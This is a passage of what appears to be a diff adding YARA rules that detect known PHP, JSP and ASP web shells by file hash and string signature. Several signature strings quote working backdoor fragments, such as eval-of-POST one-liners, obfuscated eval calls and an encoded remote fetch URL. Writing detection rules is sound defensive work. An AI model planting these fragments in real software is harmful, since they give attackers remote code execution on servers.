+ hash4 = "b9744f6876919c46a29ea05b1d95b1c3"
+ hash5 = "3ea688e3439a1f56b16694667938316d"
+ hash6 = "2434a7a07cb47ce25b41d30bc291cacc"
+ strings:
+ $s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword
+ $s4 = "out.println(\"<h2>File Manager - Current disk "\"+(cr.indexOf(\"/\") == 0?"
+ $s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
+ $s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>"
+ condition:
+ 2 of them
+}
+rule webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend {
+ meta:
+ description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+ hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+ hash2 = "8b457934da3821ba58b06a113e0d53d9"
+ hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
+ hash4 = "e0354099bee243702eb11df8d0e046df"
+ hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"
+ hash6 = "655722eaa6c646437c8ae93daac46ae0"
+ hash7 = "591ca89a25f06cf01e4345f98a22845c"
+ strings:
+ $s0 = "return new Double(format.format(value)).doubleValue();" fullword
+ $s5 = "File tempF = new File(savePath);" fullword
+ $s9 = "if (tempF.isDirectory()) {" fullword
+ condition:
+ 2 of them
+}
+rule webshell_c99_c99shell_c99_c99shell {
+ meta:
+ description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+ hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+ hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
+ hash3 = "048ccc01b873b40d57ce25a4c56ea717"
+ strings:
+ $s2 = "$bindport_pass = \"c99\";" fullword
+ $s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"
+ condition:
+ 1 of them
+}
+rule webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat {
+ meta:
+ description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "ae025c886fbe7f9ed159f49593674832"
+ hash1 = "513b7be8bd0595c377283a7c87b44b2e"
+ hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
+ hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
+ hash4 = "3f71175985848ee46cc13282fbed2269"
+ strings:
+ $s6 = "$res = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
+ $s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
+ $s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
+ $s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
+ condition:
+ 2 of them
+}
+rule webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx {
+ meta:
+ description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+ hash1 = "4745d510fed4378e4b1730f56f25e569"
+ hash2 = "f3ca29b7999643507081caab926e2e74"
+ hash3 = "46a18979750fa458a04343cf58faa9bd"
+ strings:
+ $s3 = "BODY, TD, TR {" fullword
+ $s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
+ $s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
+ condition:
+ 2 of them
+}
+rule webshell_000_403_807_a_c5_config_css_dm_he1p_xxx {
+ meta:
+ description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+ hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+ hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+ hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+ hash4 = "8b457934da3821ba58b06a113e0d53d9"
+ hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+ hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+ hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+ hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+ hash9 = "d71716df5042880ef84427acee8b121e"
+ hash10 = "341298482cf90febebb8616426080d1d"
+ hash11 = "29aebe333d6332f0ebc2258def94d57e"
+ hash12 = "42654af68e5d4ea217e6ece5389eb302"
+ hash13 = "88fc87e7c58249a398efd5ceae636073"
+ hash14 = "4a812678308475c64132a9b56254edbc"
+ hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+ hash16 = "e0354099bee243702eb11df8d0e046df"
+ hash17 = "344f9073576a066142b2023629539ebd"
+ hash18 = "32dea47d9c13f9000c4c807561341bee"
+ hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+ hash20 = "655722eaa6c646437c8ae93daac46ae0"
+ hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+ hash22 = "6acc82544be056580c3a1caaa4999956"
+ hash23 = "6aa32a6392840e161a018f3907a86968"
+ hash24 = "591ca89a25f06cf01e4345f98a22845c"
+ hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+ hash26 = "3ea688e3439a1f56b16694667938316d"
+ hash27 = "ab77e4d1006259d7cbc15884416ca88c"
+ hash28 = "71097537a91fac6b01f46f66ee2d7749"
+ hash29 = "2434a7a07cb47ce25b41d30bc291cacc"
+ hash30 = "7a4b090619ecce6f7bd838fe5c58554b"
+ strings:
+ $s3 = "String savePath = request.getParameter(\"savepath\");" fullword
+ $s4 = "URL downUrl = new URL(downFileUrl);" fullword
+ $s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
+ $s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
+ $s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
+ $s8 = "URLConnection conn = downUrl.openConnection();" fullword
+ $s9 = "sis = request.getInputStream();" fullword
+ condition:
+ 4 of them
+}
+rule webshell_2_520_icesword_job_ma1 {
+ meta:
+ description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "64a3bf9142b045b9062b204db39d4d57"
+ hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+ hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+ hash3 = "56c005690da2558690c4aa305a31ad37"
+ hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+ strings:
+ $s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
+ $s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
+ $s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
+ condition:
+ 2 of them
+}
+rule webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn {
+ meta:
+ description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "7066f4469c3ec20f4890535b5f299122"
+ hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+ hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+ hash3 = "8979594423b68489024447474d113894"
+ hash4 = "ec482fc969d182e5440521c913bab9bd"
+ hash5 = "f98d2b33cd777e160d1489afed96de39"
+ hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+ hash7 = "e9a5280f77537e23da2545306f6a19ad"
+ strings:
+ $s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol"
+ $s2 = " KB </td>" fullword
+ $s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\""
+ $s4 = "<!-- <tr align=\"center\"> " fullword
+ condition:
+ all of them
+}
+
+rule webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY {
+ meta:
+ description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+ hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+ hash2 = "40a1f840111996ff7200d18968e42cfe"
+ hash3 = "0712e3dc262b4e1f98ed25760b206836"
+ strings:
+ $s4 = "http://www.4ngel.net" fullword
+ $s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword
+ $s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
+ $s9 = "Codz by Angel" fullword
+ condition:
+ 2 of them
+}
+rule webshell_c99_locus7s_c99_w4cking_xxx {
+ meta:
+ description = "Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"
+ hash1 = "9c34adbc8fd8d908cbb341734830f971"
+ hash2 = "ef43fef943e9df90ddb6257950b3538f"
+ hash3 = "ae025c886fbe7f9ed159f49593674832"
+ hash4 = "911195a9b7c010f61b66439d9048f400"
+ hash5 = "697dae78c040150daff7db751fc0c03c"
+ hash6 = "513b7be8bd0595c377283a7c87b44b2e"
+ hash7 = "1d912c55b96e2efe8ca873d6040e3b30"
+ hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+ hash9 = "4108f28a9792b50d95f95b9e5314fa1e"
+ hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"
+ hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"
+ hash12 = "41af6fd253648885c7ad2ed524e0692d"
+ hash13 = "6fcc283470465eed4870bcc3e2d7f14d"
+ strings:
+ $s1 = "$res = @shell_exec($cfe);" fullword
+ $s8 = "$res = @ob_get_contents();" fullword
+ $s9 = "@exec($cfe,$res);" fullword
+ condition:
+ 2 of them
+}
+rule webshell_browser_201_3_ma_ma2_download {
+ meta:
+ description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+ hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+ hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+ hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+ hash4 = "4b45715fa3fa5473640e17f49ef5513d"
+ hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"
+ strings:
+ $s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
+ $s2 = "private static String tempdir = \".\";" fullword
+ $s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\""
+ condition:
+ 2 of them
+}
+rule webshell_000_403_c5_queryDong_spyjsp2010 {
+ meta:
+ description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+ hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+ hash2 = "8b457934da3821ba58b06a113e0d53d9"
+ hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+ hash4 = "655722eaa6c646437c8ae93daac46ae0"
+ strings:
+ $s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"
+ $s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"
+ $s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("
+ $s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
+ condition:
+ 2 of them
+}
+rule webshell_r57shell127_r57_kartal_r57 {
+ meta:
+ description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
+ author = "Florian Roth"
+ date = "2014/01/28"
+ score = 70
+ super_rule = 1
+ hash0 = "ae025c886fbe7f9ed159f49593674832"
+ hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
+ hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
+ strings:
+ $s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword
+ $s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword
+ $s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_"
+ condition:
+ 2 of them
+}
+
+rule webshell_webshells_new_con2 {
+ meta:
+ description = "Web shells - generated from file con2.asp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "d3584159ab299d546bd77c9654932ae3"
+ strings:
+ $s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"
+ $s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_make2 {
+ meta:
+ description = "Web shells - generated from file make2.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ hash = "9af195491101e0816a263c106e4c145e"
+ score = 50
+ strings:
+ $s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"
+ condition:
+ all of them
+}
+rule webshell_webshells_new_aaa {
+ meta:
+ description = "Web shells - generated from file aaa.asp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "68483788ab171a155db5266310c852b2"
+ strings:
+ $s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""
+ $s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"
+ $s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"
+ condition:
+ 1 of them
+}
+rule webshell_Expdoor_com_ASP {
+ meta:
+ description = "Web shells - generated from file Expdoor.com ASP.asp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "caef01bb8906d909f24d1fa109ea18a7"
+ strings:
+ $s4 = "\">www.Expdoor.com</a>" fullword
+ $s5 = " <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max"
+ $s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True) '" fullword
+ $s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\") '" fullword
+ $s16 = "<TITLE>Expdoor.com ASP" fullword
+ condition:
+ 2 of them
+}
+rule webshell_webshells_new_php2 {
+ meta:
+ description = "Web shells - generated from file php2.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "fbf2e76e6f897f6f42b896c855069276"
+ strings:
+ $s0 = "<?php $s=@$_GET[2];if(md5($s.$s)=="
+ condition:
+ all of them
+}
+rule webshell_bypass_iisuser_p {
+ meta:
+ description = "Web shells - generated from file bypass-iisuser-p.asp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "924d294400a64fa888a79316fb3ccd90"
+ strings:
+ $s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject"
+ condition:
+ all of them
+}
+rule webshell_sig_404super {
+ meta:
+ description = "Web shells - generated from file 404super.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "7ed63176226f83d36dce47ce82507b28"
+ strings:
+ $s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword
+ $s6 = " 'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword
+ $s7 = "//http://require.duapp.com/session.php" fullword
+ $s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword
+ $s12 = "//define('pass','123456');" fullword
+ $s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_JSP {
+ meta:
+ description = "Web shells - generated from file JSP.jsp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "495f1a0a4c82f986f4bdf51ae1898ee7"
+ strings:
+ $s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"
+ $s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"
+ $s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"
+ condition:
+ 1 of them
+}
+rule webshell_webshell_123 {
+ meta:
+ description = "Web shells - generated from file webshell-123.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "2782bb170acaed3829ea9a04f0ac7218"
+ strings:
+ $s0 = "// Web Shell!!" fullword
+ $s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6"
+ $s3 = "$default_charset = \"UTF-8\";" fullword
+ $s4 = "// url:http://www.weigongkai.com/shell/" fullword
+ condition:
+ 2 of them
+}
+rule webshell_dev_core {
+ meta:
+ description = "Web shells - generated from file dev_core.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "55ad9309b006884f660c41e53150fc2e"
+ strings:
+ $s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword
+ $s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword
+ $s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874"
+ $s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))"
+ $s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C"
+ $s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))"
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_pHp {
+ meta:
+ description = "Web shells - generated from file pHp.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "b0e842bdf83396c3ef8c71ff94e64167"
+ strings:
+ $s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword
+ $s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr"
+ $s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*"
+ $s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+"
+ $s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once"
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_pppp {
+ meta:
+ description = "Web shells - generated from file pppp.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "cf01cb6e09ee594545693c5d327bdd50"
+ strings:
+ $s0 = "Mail: chinese@hackermail.com" fullword
+ $s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "
+ $s6 = "Site: http://blog.weili.me" fullword
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_code {
+ meta:
+ description = "Web shells - generated from file code.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "a444014c134ff24c0be5a05c02b81a79"
+ strings:
+ $s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi"
+ $s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO"
+ $s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_"
+ $s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:"
+ $s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm"
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_jspyyy {
+ meta:
+ description = "Web shells - generated from file jspyyy.jsp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "b291bf3ccc9dac8b5c7e1739b8fa742e"
+ strings:
+ $s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")"
+ condition:
+ all of them
+}
+rule webshell_webshells_new_xxxx {
+ meta:
+ description = "Web shells - generated from file xxxx.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "5bcba70b2137375225d8eedcde2c0ebb"
+ strings:
+ $s0 = "<?php eval($_POST[1]);?> " fullword
+ condition:
+ all of them
+}
+rule webshell_webshells_new_JJjsp3 {
+ meta:
+ description = "Web shells - generated from file JJjsp3.jsp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "949ffee1e07a1269df7c69b9722d293e"
+ strings:
+ $s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S"
+ condition:
+ all of them
+}
+rule webshell_webshells_new_PHP1 {
+ meta:
+ description = "Web shells - generated from file PHP1.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "14c7281fdaf2ae004ca5fec8753ce3cb"
+ strings:
+ $s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword
+ $s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword
+ $s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_JJJsp2 {
+ meta:
+ description = "Web shells - generated from file JJJsp2.jsp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "5a9fec45236768069c99f0bfd566d754"
+ strings:
+ $s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
+ $s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
+ $s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
+ $s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_radhat {
+ meta:
+ description = "Web shells - generated from file radhat.asp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "72cb5ef226834ed791144abaa0acdfd4"
+ strings:
+ $s1 = "sod=Array(\"D\",\"7\",\"S"
+ condition:
+ all of them
+}
+rule webshell_webshells_new_asp1 {
+ meta:
+ description = "Web shells - generated from file asp1.asp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "b63e708cd58ae1ec85cf784060b69cad"
+ strings:
+ $s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword
+ $s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_php6 {
+ meta:
+ description = "Web shells - generated from file php6.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "ea75280224a735f1e445d244acdfeb7b"
+ strings:
+ $s1 = "array_map(\"asx73ert\",(ar"
+ $s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword
+ $s4 = "shell.php?qid=zxexp " fullword
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_xxx {
+ meta:
+ description = "Web shells - generated from file xxx.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "0e71428fe68b39b70adb6aeedf260ca0"
+ strings:
+ $s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword
+ condition:
+ all of them
+}
+rule webshell_GetPostpHp {
+ meta:
+ description = "Web shells - generated from file GetPostpHp.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "20ede5b8182d952728d594e6f2bb5c76"
+ strings:
+ $s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
+ condition:
+ all of them
+}
+rule webshell_webshells_new_php5 {
+ meta:
+ description = "Web shells - generated from file php5.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "cf2ab009cbd2576a806bfefb74906fdf"
+ strings:
+ $s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"
+ condition:
+ all of them
+}
+rule webshell_webshells_new_PHP {
+ meta:
+ description = "Web shells - generated from file PHP.php"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"
+ strings:
+ $s1 = "echo \"<font color=blue>Error!</font>\";" fullword
+ $s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE"
+ $s5 = " - ExpDoor.com</title>" fullword
+ $s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword
+ $s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword
+ condition:
+ 1 of them
+}
+rule webshell_webshells_new_Asp {
+ meta:
+ description = "Web shells - generated from file Asp.asp"
+ author = "Florian Roth"
+ date = "2014/03/28"
+ score = 70
+ hash = "32c87744ea404d0ea0debd55915010b7"
+ strings:
+ $s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword
+ $s2 = "Function MorfiCoder(Code)" fullword
+ $s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword
+ condition:
+ 1 of them
+}
+
+
+rule WebShell_cgi {
+ meta:
+ description = "Semi-Auto-generated - file WebShell.cgi.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "bc486c2e00b5fc3e4e783557a2441e6f"
+ strings:
+ $s0 = "WebShell.cgi"
+ $s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else"
+ condition:
+ all of them
+}
+rule WinX_Shell_html {
+ meta:
+ description = "Semi-Auto-generated - file WinX Shell.html.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "17ab5086aef89d4951fe9b7c7a561dda"
+ strings:
+ $s0 = "WinX Shell"
+ $s1 = "Created by greenwood from n57"
+ $s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>"
+ condition:
+ 2 of them
+}
+
+
+rule Dx_php_php {
+ meta:
+ description = "Semi-Auto-generated - file Dx.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+ strings:
+ $s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+ $s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util"
+ $s3 = "$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP"
+ condition:
+ 1 of them
+}
+rule csh_php_php {
+ meta:
+ description = "Semi-Auto-generated - file csh.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "194a9d3f3eac8bc56d9a7c55c016af96"
+ strings:
+ $s0 = ".::[c0derz]::. web-shell"
+ $s1 = "http://c0derz.org.ua"
+ $s2 = "vint21h@c0derz.org.ua"
+ $s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root"
+ condition:
+ 1 of them
+}
+rule pHpINJ_php_php {
+ meta:
+ description = "Semi-Auto-generated - file pHpINJ.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "d7a4b0df45d34888d5a09f745e85733f"
+ strings:
